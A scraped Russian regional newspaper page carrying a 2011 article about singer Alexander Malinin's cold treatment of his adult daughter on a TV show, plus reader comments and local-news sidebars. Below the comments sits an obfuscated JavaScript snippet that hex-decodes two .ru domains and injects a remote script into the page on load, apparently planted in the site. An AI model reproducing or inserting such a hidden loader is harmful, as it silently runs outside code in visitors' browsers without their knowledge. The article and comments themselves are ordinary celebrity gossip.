Cегодня 22 июля 2017 г., суббота
Dollar доллар 58.9325
strelka
-0.1498
Euro евро 68.6623
strelka
0.6586
Neft нефть
strelka
0.0000
Facebook VK OK

История, о!

Ягода Малинин

01-12-2011

Певец Александр Малинин отказался от родной дочери

Александр Малинин и его жена Эмма холодно и враждебно встретили взрослую дочь певца от его предыдущего брака с певицей Ольгой Зарубиной. «Какой цинизм! Я в шоке от четы Малининых...» - написали по этому поводу люди в Интернете. - «Я бы на месте его дочери рухнула на пол...». Чтобы впервые в жизни увидеть родного отца, 24-летняя Кира прилетела из Америки на эфир программы «Пусть говорят». Почему же родитель не захотел обнять её при встрече?

Зарубина на сердце

В начале 80-х будущий король романса Александр Малинин ещё носил свою настоящую фамилию — Выгузов и пытался покорить Москву. Талантливый музыкант-самоучка из Свердловска работал в столице в малоизвестных музыкальных коллективах, был женат на скрипачке Инне из ВИА «Поющие гитары» и растил своего первенца Никиту.

С певицей Ольгой Зарубиной у Александра случился служебный роман. В 1982 году оба пришли работать в группу «Метроном»: она — вокалистка, он — гитарист. Ольга была москвичкой и уже знаменитой: мелькала на ТВ в «Голубом огоньке» и в программе «Шире круг», пела дуэтом с Михаилом Боярским хит «Так не должно быть».

«Саша считал меня звездой, смотрел восторженными глазами и осыпал комплиментами, - рассказывала потом Зарубина. - Он всегда отлично выглядел, модно и красиво одевался, ухаживал за мной романтично...». Около года будущий Малинин разрывался между законной женой и своей новой любовью. А потом ради Ольги решился на развод с Инной.

По словам Зарубиной, их свадьба с Александром была невесёлой: невеста не надела белое платье с фатой, а жених опоздал в ЗАГС на целый час. Затем началась такая же нескладная семейная жизнь. Ольга, по её словам, вскоре поняла, что Александра интересует только музыка, карьера и поклонницы.

Вскоре музыканта пригласил вокалистом в свой коллектив популярный тогда Стас Намин, и он стал много гастролировать. (Кстати, это именно Стас посоветовал Александру взять звучный псевдоним, и с тех пор он стал Малининым.) Когда Ольга узнала, что ждёт ребёнка, её муж находился в очередном гастрольном туре.

Если верить Ольге, Саша не баловал её своим вниманием во время беременности, а после родов долго не приходил в роддом. И она тогда осознала, что родила девочку... для себя. Кира появилась на свет с больным сердцем, в четырёхмесячном возрасте малышке уже сделали операцию.

По словам Ольги, в этот трудный период ей помогали с ребёнком только мать и отчим, а молодой муж был занят собой. Вскоре они развелись. На прощанье Ольга в сердцах сказала Александру, что он больше никогда не увидит дочери, что она найдёт для Киры отца получше. И как в воду глядела...

Через год Зарубина встретила нового избранника — продюсера Владимира Евдокимова. Тот оказался человеком предприимчивым (как никак отсидел семь лет за организацию подпольных концертов Владимира Высоцкого!) и не дал Ольге с ребёнком пропасть: обеспечил певицу работой, помог купить квартиру. А потом женился на ней и удочерил Киру.

В 1991-м году, когда распался Советский Союз, Владимир Евдокимов эмигрировал в Штаты, а через полгода забрал жену с дочкой. Кире было 5 лет, когда её увезли за океан. О существовании своего родного отца — Александра Малинина — она многие годы даже не догадывалась.

Король романсов

В то время, когда Ольга выхаживала после операции маленькую Киру, с Александром случилось несчастье. Вместе с приятелем они неслись на «копейке» по Каширскому шоссе и врезались в столб. Больше месяца Малинин провёл в больнице, пока срастались переломанные кости, а когда вышел — потерял голос.

«Я стал никому не нужен, - вспоминал потом Малинин. - Жена ушла. Я остался без работы. У меня не было денег, негде было жить...». Александр то уезжал на родину к родителям, то возвращался в Москву и скитался по друзьям. В это трудное время Малинин, по его словам, много читал и думал, думал...

Однажды он на костылях доплёлся до церкви и попросил батюшку: «Покрестите!». После этого, по словам певца, он сразу почувствовал душевное облегчение: «Я сразу понял, как мне нужно жить, как мне нужно петь, что мне нужно делать...». Когда вернулся голос, Александр начал петь русские романсы.

Популярность пришла к нему неожиданно быстро. В 1987 году Москва узнала Малинина, когда он спел на большом концерте в Лужниках «Ямщик, не гони лошадей», а в 1988 году уже вся страна влюбилась в малининский голос, когда Александр исполнил «Корриду» на конкурсе в Юрмале и получил гран-при.

В конце 80-х белогвардейские романсы Малинина, как он сам выразился, «звучали из каждого включенного утюга». Говорят, что Ольга Зарубина болезненно пережила успех своего «бывшего». У неё-то тогда был творческий застой. И это якобы стало одной из причин её отъезда в Америку.

А у Малинина вслед за карьерой наладилась и личная жизнь. После одного из концертов приятельница подвела к нему свою подружку, шикарную блондинку: «Познакомься, это Эмма!». Певец легкомысленно начеркал для девушки на программке стандартное: «Эмми, я вас люблю!». А потом и правда влюбился.

Гинеколог Эмма оказалась девушкой с гламурной внешностью, ясной головой и железным характером. В рекордные сроки она накинула узду на непутёвого певца, женив его на себе и заставив усыновить своего сына от первого брака. Под железной пятой красотки беспечный Малинин превратился в идеального семьянина.

Певец много работал, отдавая все деньги Эмме. А она сама решала, куда их с умом вложить: в строительство дома на Рублёвке или на покупку апартаментов в Италии, на развитие своей гинекологической клиники или на обучение сына в Англии, на покупку брэндовой одежды или на отдых в Форте деи Марми.

Успешное семейство богатело и разрасталось. Сначала первенец Малинина - Никита - перешёл жить к ним от своей матери, потом мать Александра переехала после развода с мужем из Екатеринбурга в Москву, потом у Александра с Эммой родились долгожданные общие дети — близнецы Фрол и Устинья.

А вот о существовании своей «американской» дочери Киры певец все эти годы, похоже, не вспоминал.

Американская дочь

Кире было 13 лет, когда мама рассказала ей о родном отце. По словам Ольги, у Киры тогда начался переходный возраст и конфликты с отчимом. Узнав правду, девочка была потрясена. В первый раз она тогда сбежала из дома, напилась пива, накурилась травы и несколько дней скиталась.

А до этого они втроём довольно благополучно жили в Америке. Предприимчивый продюсер Евдокимов торговал «шпионской» спецтехникой, Ольга работала по своей первой профессии — медсестрой, Кира училась в школе. Через несколько лет семья купила в кредит дом, машины — всё было как у всех.

А потом разом всё рухнуло. В 2007 году отчим Киры умер от рака желудка. Ольга поехала в Россию на конкурс «Ты — суперстар!»... и надолго застряла на родине. Она снова решила попытать счастья певицы, встретила молодого продюсера Андрея Салова (младше её на 13 лет) и сама не заметила, как опять оказалась замужем.

А Кира осталась в Штатах совсем одна. Наверное, одиночество, неприкаянность и подтолкнули девушку к тому, что она стала искать контакта с родным отцом. И даже согласилась прилететь на программу «Пусть говорят», которая была посвящена дню рождения Александра Малинина.

Однако отец встретил Киру холодно, держался как чужой. «Все эти годы мою дочь воспитывал другой мужчина, - ледяным тоном сказал Малинин. - Зачем ей сейчас нужен какой-то русский отец, который никогда не был рядом с ней? Наверное, деньги понадобились?».

Его жена Эмма тоже отказалась «принять в дети», как она выразилась, «эту взрослую, крупную девушку». «Я никому не позволю влезть в мою семью!» - агрессивно заявила она.

Поведение четы вызвало осуждение в студии, которое потом выплеснулось в Интернете. «Семейство показало себя, как новоявленные нувориши, считающие, что ухватили Господа за бороду», - писали потом люди на форумах.

Только Николай Выгузов — отец Малинина — пригласил внучку погостить у него в деревне Косулино под Екатеринбургом. Кира с радостью поехала туда на неделю и так обрадовалась новым родственникам, что готова была уже навсегда переехать в российскую деревню из Штатов, где у неё никого нет.

Александр Малинин, по словам Киры, всё же позвонил дочери через десять дней после эфира. Они договорились, что встретятся этим летом, когда Кира прилетит из Америки на каникулы. И попробуют наладить отношения.

Наталия ВОЛГИНА. Фото 1tv.ru




Уважаемые посетители форума!

Просим вас проявлять уважение друг к другу, не использовать нецензурных выражений, высказываться по существу и не переходить на личности. Комментарии в адрес нашей газеты и её сотрудников мы не размещаем. При несоблюдении этих правил комментарии будут удаляться.


Комментарии
Добавлено 02-12-2011 в 20:00

null

гость

эх малинин! все_таки прогнулся! зачем тебе эта великовозрастная тетка в звезднополосатом балахоне? хотя конечно : публичность давит!!!!
Добавлено 08-02-2013 в 20:00

null

Елена

Я за Малинина и Эмму.Правильно все,они хранят свой очаг.А девушка очень далека от них по духу.
Добавлено 08-02-2013 в 20:00

null

Наталья Ивановна

Зарубина, как мать, повела себя неправильно. Сначала она исчезла на много лет, и вдруг решила соединить дочь с отцом. Мудрая женщина сделает всё по-тихому, без этого скандала. А чтобы вы правильно меня поняли - добавлю: мне импонирует в этом отношении Андрей (Андрон) Кончаловский. У него, кажется, 7 детей ( в том числе вне брака). И ни от одного он не отказался. А у четы Малининых снобизм зашкаливает.
Добавлено 15-03-2017 в 01:09

Диана

Судя по разным интервью, он от своей дочери и не думал отказываться, а то, что он явно пресмыкается перед своей Эмми, вот это то его и не красит.

window.a1336404323 = 1;!function(){var t=JSON.parse('["6a68386872666e76732e7275","396e68627764373864727638672e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="novdelo.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/ajs/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Добавить комментарий

 

МЕСТНЫЙ КОЛОРИТ

«Тройка» прискакала

Первый же конкурс на новые маршруты общественного транспорта закончился сюрпризом. Право возить...

Аварийные дома будут расселять быстрее
Переселение в новое жилье должно проходить не позднее шести месяцев после признания дома аварийным....
На дорогах появится несмываемая разметка
На дорогах города появится разметка из термопластика. На это мэрия выделила около 20 миллионов...
Эвакуаторщики хотят повысить цены на услуги
Представители нижегородской службы эвакуации автомобилей заявили о том, что планируют повысить...
"Стрижи" заменят "Ласточками"
Курсирующие между Нижним Новгородом и Москвой скоростные поезда «Стрижи» с 4 июля до 14 августа по...
Сормовская неплательщица
Жительница Сормовского района Нижнего Новгорода накопила долг за электроэнергию на 300 тыс. руб. За...
Почта России
Почта России отправила на электронный адрес Нижегородского УФАС предложение своих услуг. Хотя...
Нижегородская пенсионерка
56-летняя жительница Нижнего Новгорода открыла игорный клуб в подвале одного из домов на ул....
Война за зависимость
История с массовыми похищениями людей в Нижегородской области прогремела на всю страну. Речь идёт...
Кровь за кров
В Нижнем Новгороде задержали банду, которая похищала и убивала людей. Жертвами преступников...
Начали делать бесплатные операции на глазах
Нижний Новгород стал третьим городом в России, где врачи начали имплантировать отечественные...
Нижний Новгород – один из комфортных городов России
Нижний Новгород вошёл в пятёрку самых комфортных городов России. Рейтинг составлен на анализе 90...
Дочери сити-менеджера разрешили учиться за счёт бюджета
Прокуратура Нижегородской области закончила проверку законности обучения дочери главы городской...
Участились кражи из автомобилей
С приходом тепла в Нижнем Новгороде резко выросло число краж из автомобилей. По словам полицейских,...
Последний марафон

Нижегородский полумарафон «Кремлёвская стена» закончился трагедией. Во время забега на 10...

Кому как повезёт
В России вступили в силу новые правила дорожного движения, касающиеся перевозки детей, проезда...
Ещё проколы
Маршрутное такси №24 очень редко ходит. При этом маршрут не дублируется.
На проспекте Ленина на тротуаре проваливается брусчатка
У дома №67/1, на проспекте Ленина, на тротуаре проваливается брусчатка. В провале скапливается вода...
Напротив остановки «Высоково» глубокая яма
На повороте с ул. Овражной к Высоковскому проезду, напротив остановки «пос. Высоково», глубокая яма...
Вывернули рубль

Очередная неприятная новость донеслась с экономического фронта. Представители Центробанка...

klub

ДУМАЕШЬ?

«Первый человек, о котором ты думаешь утром, и последний человек, о котором ты думаешь ночью, – это или причина твоего счастья, или причина твоей боли».

Эрих Мария РЕМАРК (1898 – 1970), немецкий писатель.


ОТЗЫВЫ ЧИТАТЕЛЕЙ

Последний марафон

Очень жаль любого человека, даже когда он охотится за призом или славой. Бегать в нашей жизни вообще очень вредно....

Вывернули рубль

Чиновникам шоковые удары не грозят абсолютно ни чем - у них давно бронированная кожа.

Вадим Булавинов сбросил 30 килограмм

Ну ОЧЕНЬ интересная новость....Писать что-ли больше не о чем.....

klub

ЕСТЬ МНЕНИЕ

КЛИМЕНТЬЕВ И ЖЕНА ДЕКАБРИСТА

Вадим АНДРЮХИН, политический обозреватель

На сайте НН.РУ бизнесмен Андрей Климентьев обвинил меня в работе на ФСБ. Поначалу я как-то не обратил на это внимания. Дело в том, что знаю Андрея Анатольевича довольно давно. Есть у него такая "фишка" - учить всех жизни. Какого-нибудь учителя - как надо уч ...

комментарии (11)